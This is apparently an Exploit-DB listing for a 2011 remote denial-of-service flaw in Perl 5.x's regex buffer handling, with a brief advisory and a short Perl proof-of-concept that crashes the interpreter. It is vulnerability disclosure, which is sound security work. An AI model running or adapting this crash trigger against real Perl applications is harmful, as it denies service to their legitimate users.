Lucene search

K
exploitdbVladimir PerepelitsaEDB-ID:35489
HistoryMar 23, 2011 - 12:00 a.m.

Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service

2011-03-2300:00:00
Vladimir Perepelitsa
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/47006/info

Perl is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users. 

#!/usr/bin/perl


my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}

AI Score

7.4

Confidence

Low